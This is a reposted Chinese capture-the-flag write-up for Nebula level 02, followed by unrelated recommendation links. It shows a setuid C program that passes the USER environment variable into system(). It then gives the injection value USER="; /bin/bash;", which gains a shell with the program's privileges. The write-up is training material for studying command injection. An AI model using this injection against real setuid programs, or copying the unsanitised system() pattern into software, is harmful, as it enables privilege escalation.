Nebula Challenge 02

利用环境变量注入实现代码执行
最新推荐文章于 2018-07-23 21:58:00 发布
转载 最新推荐文章于 2018-07-23 21:58:00 发布 · 127 阅读 · 0 ·
CC 4.0 BY-SA版权
原文链接:http://www.cnblogs.com/iamgroot/p/9306256.html

本文介绍了一种通过修改$USER环境变量进行代码注入的方法,并最终触发system函数执行任意命令的技术细节。通过构造特定的字符串,攻击者可以绕过程序的安全限制执行如/bin/bash等命令。

 

题目简介:还是任意代码执行,不过这道题是用了类似注入的方式。

 1 #include <stdlib.h>
 2 #include <unistd.h>
 3 #include <string.h>
 4 #include <sys/types.h>
 5 #include <stdio.h>
 6 
 7 int main(int argc, char **argv, char **envp)
 8 {
 9   char *buffer;
10 
11   gid_t gid;
12   uid_t uid;
13 
14   gid = getegid();
15   uid = geteuid();
16 
17   setresgid(gid, gid, gid);
18   setresuid(uid, uid, uid);
19 
20   buffer = NULL;
21 
22   asprintf(&buffer, "/bin/echo %s is cool", getenv("USER"));
23   printf("about to call system(\"%s\")\n", buffer);
24   
25   system(buffer);
26 }

 

程序与外界的交互是$USER变量,可以对其进行注入,然后到system()中执行。

 

命令:USER="; /bin/bash;"

  " " —— 防止/bin/bash被作为命令执行

  ; —— 结束之前的命令,开始新命令

  /bin/bash —— 用于system("/bin/bash")的形成

 

 

转载于:https://www.cnblogs.com/iamgroot/p/9306256.html

docker-compose部署arm架构的nebula3.6版本
05-30
这些文件通常包含了启动Nebula Graph服务所需的所有配置信息,包括但不限于Nebula Graph服务的镜像名称、端口映射、环境变量设置等。 当我们下载了docker-compose文件后,下一步是通过docker load命令加载Nebula ...
nebula-V3.3.0镜像资源包
01-23
nebula-V3.3.0镜像资源包,包含meta、storged及graphd对应的镜像,以及nebula-console文件
Nebula challenge 01
weixin_30827565的博客
07-13 107
题目:下列代码存在任意程序执行漏洞,用户level01需要提权到flag01 #include <stdlib.h> #include <unistd.h> #include <string.h> #include <sys/types.h> #include <stdio.h> int main(int argc, ...
Nebula Challenge 04
weixin_30429201的博客
07-23 112
考察点:软链接 ln -s target_filename symlink_filename将上述命令中的target_filename用符号链接将要指向的相对路径或者绝对路径进行替换。在通常的情况下,目标文件应该存在。但是也可以创建一个指向不存在目标的符号链接。将symlink_filename用希望的符号链接名替换。这条ln命令将会创建一条符号链接。当创建完符号链接之后,可以将syml...
Nebula Challenge 03
weixin_30646315的博客
07-23 91
/home/flag03 目录下有 writable.d 文件夹和 writable.sh 文件,查看.sh文件的内容,发现这个脚本是将writable.d文件夹里的内容执行5秒,然后kill 进程,并删除文件。 这个writable.sh脚本是flag03用户每隔几分钟运行一次;writable.d文件夹是所有用户可写的 可以仿照第一题的C #define _GNU_...
suid和sgid--Nebula challenge 00
weixin_30641999的博客
07-13 119
suid:set-user-id位,设置了suid位的文件被执行时,程序具有文件所有者的权限而不是执行者的权限。 sgid:set-group-id位,设置了suid位的文件被执行时,程序具有所有组的权限 一句话介绍:让用户在执行此程序时可以访问原本没有权限的资源。 euid:effective-user-id egid:effective-group-id 内核根据euid和egid判...
Nebula_level02
yuansunxue的专栏
01-29 348
exploit-exercises Nebula: level02 In level02 Nebula challenge, we have the following source code #include #include #include #include #include int main(int argc, char **argv, ch
Nebula: level05
yuansunxue的专栏
02-08 745
exploit-exercises Nebula: level05 This is the write-up for level05 of Nebula wargame. We are told to check the flag05 home directory and look for weak permissions. level05@nebula:/home/flag05$
Nebula_level03
yuansunxue的专栏
01-29 379
exploit-exercises Nebula: level03 In level03 challenge of Nebula, we are told that there is a crontab running every couple of minutes. level03@nebula:/home/flag03$ ls -ltotal 8 drwxrwxrwx 2
Nebula: level06
yuansunxue的专栏
02-08 331
exploit-exercises Nebula: level06 In level06, we are told that the account credentials for flag06 user account come from a legacy unix system. Let's go straight to the bank. level06@nebula:~$
Nebula_Level04
yuansunxue的专栏
01-29 351
http://www.kroosec.com/2012/10/nebula-level04.html     exploit-exercises Nebula: level04 In level04 of Nebula wargame, we are tasked to exploit flag04 binary to read a token file. The so
nebula
03-29
Nebula是便携式的,并且可以在Linux,OSX和Windows上运行。 (也:保持安静,但是我们有一个在iOS上运行的早期原型)。 它可以用于连接少量计算机,但也可以连接数万台计算机。 支持的架构 我们的映像支持多种架构...
nebula-graph-studio-3.8.0 ARM架构编译完成的包
12-19
Nebula Graph Studio 3.8.0 在 ARM 架构下的编译与应用》 在当前数字化时代,图数据库作为一种高效的数据管理工具,正逐渐受到广泛关注。Nebula Graph,作为一款高性能、分布式、易扩展的图数据库,其图形化管理...
nebula图数据库V2.6.0
02-18
**Nebula图数据库V2.6.0详解** Nebula Graph是一款高性能、分布式的图数据库,专门设计用于处理大规模复杂数据网络的查询和分析。在V2.6.0版本中,Nebula进一步优化了性能和功能,提升了用户体验,使其在大数据领域...
tika-parser-font-module-3.1.0.jar中文-英文对照文档.zip
09-07
1、压缩文件中包含: 中文-英文对照文档、jar包下载地址、Maven依赖、Gradle依赖、源代码下载地址。 2、使用方法: 解压最外层zip,再解压其中的zip包,双击 【index.html】 文件,即可用浏览器打开、进行查看。 3、特殊说明: (1)本文档为人性化翻译,精心制作,请放心使用; (2)只翻译了该翻译的内容,如:注释、说明、描述、用法讲解 等; (3)不该翻译的内容保持原样,如:类名、方法名、包名、类型、关键字、代码 等。 4、温馨提示: (1)为了防止解压后路径太长导致浏览器无法打开,推荐在解压时选择“解压到当前文件夹”(放心,自带文件夹,文件不会散落一地); (2)有时,一套Java组件会有多个jar,所以在下载前,请仔细阅读本篇描述,以确保这就是你需要的文件。 5、本文件关键字: jar中文-英文对照文档.zip,java,jar包,Maven,第三方jar包,组件,开源组件,第三方组件,Gradle,中文API文档,手册,开发手册,使用手册,参考手册。
perl-SelfLoader-1.23-420.el8.tar.gz
09-07
# 适用操作系统:Centos8 #Step1、解压 tar -zxvf xxx.el8.tar.gz #Step2、进入解压后的目录,执行安装 sudo rpm -ivh *.rpm
tika-parser-audiovideo-module-3.1.0.jar中文-英文对照文档.zip
09-07
1、压缩文件中包含: 中文-英文对照文档、jar包下载地址、Maven依赖、Gradle依赖、源代码下载地址。 2、使用方法: 解压最外层zip,再解压其中的zip包,双击 【index.html】 文件,即可用浏览器打开、进行查看。 3、特殊说明: (1)本文档为人性化翻译,精心制作,请放心使用; (2)只翻译了该翻译的内容,如:注释、说明、描述、用法讲解 等; (3)不该翻译的内容保持原样,如:类名、方法名、包名、类型、关键字、代码 等。 4、温馨提示: (1)为了防止解压后路径太长导致浏览器无法打开,推荐在解压时选择“解压到当前文件夹”(放心,自带文件夹,文件不会散落一地); (2)有时,一套Java组件会有多个jar,所以在下载前,请仔细阅读本篇描述,以确保这就是你需要的文件。 5、本文件关键字: jar中文-英文对照文档.zip,java,jar包,Maven,第三方jar包,组件,开源组件,第三方组件,Gradle,中文API文档,手册,开发手册,使用手册,参考手册。
【故障诊断】基于matlab空气数据传感器在存在大气湍流的情况下故障检测和诊断【含Matlab源码 14132期】.zip
最新发布
09-07
Matlab领域上传的视频是由对应的完整代码运行得来的,完整代码皆可运行,亲测可用,适合小白; 1、从视频里可见完整代码的目录内容 主函数:main.m; 调用函数:其他m文件;无需运行 运行结果效果图; 2、代码运行版本 Matlab 2019b;若运行有误,根据提示修改;若不会,私信博主; 3、运行操作步骤 步骤一:将所有文件放到Matlab的当前文件夹中; 步骤二:双击打开main.m文件; 步骤三:点击运行,等程序运行完得到结果; 4、仿真咨询 如需其他服务,可私信博主; 4.1 博客或资源的完整代码提供 4.2 期刊或参考文献复现 4.3 Matlab程序定制 4.4 科研合作
perl-Scalar-String-0.003-8.el8.tar.gz
09-07
# 适用操作系统:Centos8 #Step1、解压 tar -zxvf xxx.el8.tar.gz #Step2、进入解压后的目录,执行安装 sudo rpm -ivh *.rpm
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值